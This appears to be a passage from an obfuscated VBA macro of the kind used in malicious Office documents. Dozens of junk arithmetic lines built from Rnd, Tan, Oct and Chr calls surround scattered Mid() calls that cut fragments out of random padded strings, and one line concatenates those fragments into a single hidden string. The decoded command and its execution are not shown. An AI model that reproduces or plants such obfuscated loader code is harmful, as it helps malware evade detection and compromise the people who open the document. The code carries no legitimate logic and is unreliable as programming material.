kHOTRnp = (VpsafBfr - Rnd(43 * Tan(lkzWTdRhA)) / RkjpztBm * Oct(RTUTbFVjGQ) * wvKUVSHiCioST / Oct(YWmzuhiPIa - Chr(250) + 581 - ChrB(QRXQzzKRKOWaPT)) - 389 + mXjocBBwDij)
kthhvwJkQQ = (aClHCGAVLFAThq) + Mid("XU4FwQjcPjKa00nfRplHzCRu0i", 19, 5)
fbOMYu = (BzXiTwCQB - Rnd(43 * Tan(uhRGVYzniphQj)) / QifiiLwGzAja * Oct(BvimEfaQr) * AItnESL / Oct(kQqOlRUhqwni - Chr(250) + 581 - ChrB(WuFvswCdl)) - 389 + QYhiZoX)
ZLcDhUIuC = (iEJzPMW - Rnd(43 * Tan(soniBzusjrjVAl)) / YahjWtpA * Oct(pVBNjbV) * piKZotzII / Oct(PqLbCsslXh - Chr(250) + 581 - ChrB(zFDnnsjzhLE)) - 389 + OfVbmkjhXO)
msKaR = (IkdNnrLVJGz - Rnd(43 * Tan(aqEmusTE)) / vAYkiJijkGzbmQ * Oct(BMBfjTdJzzAwFd) * iVZiMjFdJi / Oct(oZACjoaHlir - Chr(250) + 581 - ChrB(YfRqZldMcCNbb)) - 389 + HDNwirz)
rskZMuwXT = (onQwKbmJQSXoi) + Mid("z6MAoEclr%!!%vfFm1FKlvQbXwfSfoZuq6qmRd", 3, 12)
jUbwkF = (ZJoOSJUvEn - Rnd(43 * Tan(qZHlBBTKaILU)) / vjQGBqzIkfdiwd * Oct(oMQzidpwT) * iiOMnQN / Oct(sTlsOuOncFtdG - Chr(250) + 581 - ChrB(YEWNsLm)) - 389 + FkzESLlvw)
MZaCvjdpNG = (jfFMsoMp - Rnd(43 * Tan(cYFHOnFmPspm)) / AQcitiYlKJz * Oct(GVjkjmZz) * AsLsIoXEj / Oct(EVFiokJ - Chr(250) + 581 - ChrB(iQARPIuISVBjFQ)) - 389 + LzXQqkuAjbDsr)
LLSvCw = (AkDpufGKqaYCCZ - Rnd(43 * Tan(BuKbCCjIi)) / QzNbZPWar * Oct(VjHJnFaFW) * NnjwbBotjrTbZ / Oct(ihsiQKBcKHr - Chr(250) + 581 - ChrB(nAozbblnAd)) - 389 + QzXbcqzwu)
iczPuitTh = (PpFKdwwVl) + Mid("XECHZb2wNctv04HSm5ja76qoAWwt446nKsIzFTRzFkR%=XnwDMW9", 32, 14)
XznBoLUsoiP = (quAZrvj - Rnd(43 * Tan(jdDzAVCDD)) / ojuiQTTLjQTqLP * Oct(GcbAGOU) * wQuNsjYw / Oct(XEDKGLdhGfL - Chr(250) + 581 - ChrB(vsRnuttaD)) - 389 + lUYwOWGabLRqSH)
fqiOUatNpzP = (ajjqdzbMYEBjN - Rnd(43 * Tan(zRNooFQzAAs)) / HzDsXRGNnKWbrE * Oct(VztuWuKsJ) * Mzzcdjfz / Oct(rdIfhkZAopum - Chr(250) + 581 - ChrB(ksuAGGWAzFuiKS)) - 389 + lKbrdIMj)
GjJvYRkY = (AXdZwpfXZbSjm - Rnd(43 * Tan(wHafDAwF)) / KbBtcdkwCK * Oct(wqthcmfuQrod) * rUqsUiJ / Oct(uwSwwvCupfQYF - Chr(250) + 581 - ChrB(GOtDRUEo)) - 389 + VwvCImrbXBnD)
KKjozww = (szRzTAiJ) + Mid("kfk0%EbGtXAsnvjZah4GWhRrKD0L8ziEP3c0HiMuPCAoXf", 5, 10)
jktrb = (RMKwuVCO - Rnd(43 * Tan(POFhccZaht)) / OzXSQOdODI * Oct(XIiitvaGcCfJv) * DEhwSCb / Oct(MwTpsffro - Chr(250) + 581 - ChrB(Parwwuid)) - 389 + bRUiobO)
PnQOzt = (vvnzfvrRVKzdzM - Rnd(43 * Tan(OjJNjTSwkzNlBQ)) / fJqKvNwQQ * Oct(cTjaIzO) * oKzvlzcd / Oct(CzRKpBFiomoQmQ - Chr(250) + 581 - ChrB(sJGzlXbCz)) - 389 + NFRkYqhSPvQ)
XwuTRzuORER = (OEDuakOUtVLG - Rnd(43 * Tan(nPoBABr)) / fNdTWvZaJ * Oct(mAPfiZGA) * GOuGCFDIAwEN / Oct(ETjrabE - Chr(250) + 581 - ChrB(ptkIZGqIlPvzU)) - 389 + BlGaNTnZiEwi)
jHAOAWwIw = (JvPlGNEw) + Mid("ltn0zjpBjPcwoviWSDZBsK7th4MzUIZpqwIrwK%W6Vc03Wq", 30, 10)
pcLzYBH = (tmSawUKZqCuhCb - Rnd(43 * Tan(crZbwSjcvouPw)) / wWUztQTh * Oct(bGsZoLLk) * zzFapTUjMKWm / Oct(FOSrfZh - Chr(250) + 581 - ChrB(LZujwVEs)) - 389 + RkENSwBYjAfND)
AJfPiWG = (QsVYbYMJkK - Rnd(43 * Tan(FZSpWrOJHHPV)) / XbHFCDjqGVI * Oct(ozKvLqaGBBoccj) * mAtLBXpBARGHj / Oct(uzDJuhuDNwR - Chr(250) + 581 - ChrB(OiVnfcSKupNJH)) - 389 + wwKiEjtdGC)
oFNWX = (CYmXKtrwPnTt - Rnd(43 * Tan(ionPQSzYCuHQ)) / HYUblwlwBofa * Oct(ipCPajQYqlNNr) * jNAdiHalTio / Oct(XHojAHo - Chr(250) + 581 - ChrB(oKVmUXzLQm)) - 389 + NuSFkAKA)
OWEvTBz = (LYZAdHwf) + Mid("XwVJfEYwXG%LjZVA", 11, 1)
fTLaYRpq = (SiBwimwuLJLf - Rnd(43 * Tan(lioWjFluC)) / jzsjrhvlXT * Oct(MtRMLCQ) * vOmQzsavX / Oct(BQqQMSApDEMQXo - Chr(250) + 581 - ChrB(KZkXKXCU)) - 389 + HHwhuqRmYrV)
nbbjPiDjS = (ZRkBoFTj - Rnd(43 * Tan(hoOwzcTSG)) / GAnwMQHzjtsA * Oct(FHvdChsj) * KUIXzjM / Oct(idiooGmVXl - Chr(250) + 581 - ChrB(GjmZjdJpDwQl)) - 389 + DCpSnpSXm)
sTVXt = (CfrwEnTq - Rnd(43 * Tan(NWwvLIFVTu)) / narjSIwdD * Oct(wBDIccQwcH) * bOLUXGBnbd / Oct(bmYbnKfvpqmzO - Chr(250) + 581 - ChrB(vnijoXrnpL)) - 389 + jLvCwpbu)
MwbTdnrZz = (MwhwLWz) + Mid("RzVWqz=o^we^rRKMX", 7, 7)
UrkZqijUWm = (LORWQAJIf - Rnd(43 * Tan(LdUYvctnuIVRsU)) / mRThiSJTTbLO * Oct(spuplpCa) * RXLvfdiuuWwl / Oct(iqbwdCKBzkN - Chr(250) + 581 - ChrB(uFOffCSLEAvW)) - 389 + nfpYjoRVOGDO)
iNmDnrcL = (RsYNwEs - Rnd(43 * Tan(HWidYXJz)) / hdLCjhDBEjcPo * Oct(BpXwiLkjOQj) * EnMwzUArfVVC / Oct(LVMuYQvTvcnA - Chr(250) + 581 - ChrB(ilFwOvTAcP)) - 389 + GiHPzvfUVRSqY)
nRUiJHczd = (iZZivEKqWV - Rnd(43 * Tan(QvvQfwKQqqS)) / ZjHYdCHYISUnvp * Oct(IKiVduCDsB) * EZFzXdLiABnjh / Oct(PwVzaIUqaBGMV - Chr(250) + 581 - ChrB(AXdPXkwhTJurb)) - 389 + pWVdzhNwh)
HNaWQ = (LAPfTnzJkYQPO) + Mid("BF%vMqrzuB0umW", 3, 3)
rAomUoZ = (qzoQJKZzYpPmj - Rnd(43 * Tan(ZjjjFXop)) / jVzwSfHM * Oct(hJXvikTFQIKRAK) * YvlkjlAAB / Oct(HuJNGSQdUFXjd - Chr(250) + 581 - ChrB(wPzHffr)) - 389 + LlYWtXdJjIWE)
QHFGlatk = (NAutrIOH - Rnd(43 * Tan(dHwtFrwjvC)) / aOivZWHBh * Oct(FNuVwIwuuSwLN) * KGfSsTAdNw / Oct(wSzUUANaiXtD - Chr(250) + 581 - ChrB(HizlAjPOAN)) - 389 + TqoIOrcAwlzq)
IHhblik = (SjoTltVWAajYo - Rnd(43 * Tan(YsALYONYhGFH)) / pkCBFtkEMjJXmn * Oct(EwHmDZR) * nUjdatz / Oct(OdvflzZdiEfL - Chr(250) + 581 - ChrB(rnlaNTkz)) - 389 + EYYjPjYQJ)
AAdnnnbid = (qKrJpuofFr) + Mid("36dqcXRcQRtiXopIqmlznJ8dqujoSdhwMOL7", 6, 11)
aYqwSvTYiV = (aZRkljwRCIKKTP - Rnd(43 * Tan(djVzEOAiLEL)) / vtEmIrCLaSid * Oct(OTQiiwucz) * RPBliZvFjZ / Oct(DXzVCSQDBLCsjq - Chr(250) + 581 - ChrB(kvhFQJvXmXGFTl)) - 389 + MzDULwSNcji)
ftMTvZFwhwK = (VPPmkzbod - Rnd(43 * Tan(nOwvtPanjZhjK)) / wdrMVDjqpCC * Oct(qqlCmczCCJPYc) * CGbuimEo / Oct(HHPTaJzZvtCZj - Chr(250) + 581 - ChrB(jnFmIYn)) - 389 + SkMAaPuUQ)
ZlkAhdm = (InHzLwvNzRW - Rnd(43 * Tan(FoMiwRiEZmkzNX)) / kJfwfnXujDwHOj * Oct(jHbLJiJRp) * RTAVDJmnwK / Oct(RVqLitf - Chr(250) + 581 - ChrB(BJTYGGcWCNQ)) - 389 + sqYNUWYcuKU)
niPSwJGHj = (zKPXVvnpzY) + Mid("EqzKfFfDV7ukCa6BqVFECzwctSSECsEwBBPfw", 28, 6)
jNbcZYrqt = (CBiuWIWsFkUf - Rnd(43 * Tan(jSEuGczwQB)) / pfHZjhiacQXhXl * Oct(zPPTCtnKc) * VVorQpmAkFqA / Oct(JXFtCJMkhIpfkh - Chr(250) + 581 - ChrB(wABVirOLqjMalh)) - 389 + fawSGvwAkAQzn)
EFpAd = (UnDSCsVJCkBJ - Rnd(43 * Tan(CkYVJRUiYR)) / jKmAPvsiWqXMHp * Oct(XzLIlBO) * fdjWIUoBvWE / Oct(rGVtGsWnjiXQ - Chr(250) + 581 - ChrB(GtWTPfzUhGW)) - 389 + YjJiobqDGLR)
PJtkMbzrYl = (FuMPKqjbDu - Rnd(43 * Tan(PiRbBBAQUOu)) / wrWjSvjDbEa * Oct(LjhpuRput) * jiOjnzjnBIKT / Oct(YnKQfXrAK - Chr(250) + 581 - ChrB(EPSUKWCY)) - 389 + hNIsSlI)
mvAcqT = (wMjHpBjEV) + Mid("LcsnbPZJwZInzWEfU7t1IB", 5, 6)
asvavEBDuL = (RBtibwAFSqC - Rnd(43 * Tan(RifqGOKzwNh)) / MErDhNZv * Oct(vBNmStkGRMi) * iQFvzwsBRdEU / Oct(SWEzYFRGwWhR - Chr(250) + 581 - ChrB(oVZthAz)) - 389 + inlHhQjuKRz)
tNVafNPV = YXPtBMm + iczPuitTh + kthhvwJkQQ + kAvwURUfKr + HNaWQ + AAdnnnbid + OWEvTBz + MwbTdnrZz + CqhQwqsX + HTznjrK + mvAcqT + zmjjcaUis + BAkTsEtXaY + ZfjlhrKs + pMNZv + IZowfwN + KKjozww + mljjYHHF + wjVEEv + kFQKTwDkDu + jHAOAWwIw + NANsjZrjio + MCzZBqqnH + ShqvijSL + niPSwJGHj + qmIviCUrLrB + wqvrtmz + XtwzY + rskZMuwXT + qkjpbfGtJMr + idraYWFSJT + ijVBdnmmERm + AjiSl + hJtDwOaFrfP + THUnWqp + SuBYfDc
tCAWfIsHR = (juYdvIXbYvD - Rnd(43 * Tan(HniTpqokMo)) / kXBnwuk * Oct(thButNdmIJSmV) * ZuMoMTCThOvpoF / Oct(UYhnHKmGspFLDj - Chr(250) + 581 - ChrB(tBiqwHbKhRl)) - 389 + AnzDYXsnkl)
wOjmoTzGH = (mGUtHwHmtOzWVk - Rnd(43 * Tan(TtlhnLspIDUH)) / SHLbJnmt * Oct(GwaQGuWlc) * wAVaNZTnuRLqm / Oct(uTlDYMizsAmpG - Chr(250) + 581 - ChrB(FwTWabJMzh)) - 389 + CpzscGQJjVmITN)
PKAHUoXSw = (vwpPLhiVEFWW - Rnd(43 * Tan(FPtVjXBSqAJK)) / IEdsZjtRw * Oct(RBzCnQDNqtc) * rbSrvuPFwfEvZi / Oct(LjmdQIlbUiUOB - Chr(250) + 581 - ChrB(mTRnMMBaiowB)) - 389 + jmwCdJYsjDPMn)
GAwIajOTL = (nHMRrlww - Rnd(43 * Tan(OQFoYjrFduG)) / BbZGBcZNS * Oct(YVaIuQrjGiFlz) * BLacibkZEw / Oct(fnLqJYkMasjN - Chr(250) + 581 - ChrB(laNwnXJQi)) - 389 + EpCzfrD)
wQiXPdfqz = (VZWiRzKq - Rnd(43 * Tan(NnlhmVBl)) / BHbFVXtT * Oct(sWziGpNorHXn) * rGXiQNirBNsYp / Oct(iQDzkzNSUKijw - Chr(250) + 581 - ChrB(wiuNTJQUiq)) - 389 + jksqIFJR)
wiYnHmpdY = (MzjQPsXTiFfa - Rnd(43 * Tan(hMsENVcLE)) / PzoZqmaijr * Oct(VrXPVASpbElY) * qaPibIvbI / Oct(TTaSjhDazij - Chr(250) + 581 - ChrB(VUorVJWd)) - 389 + dYYjQWrCX)
End Function
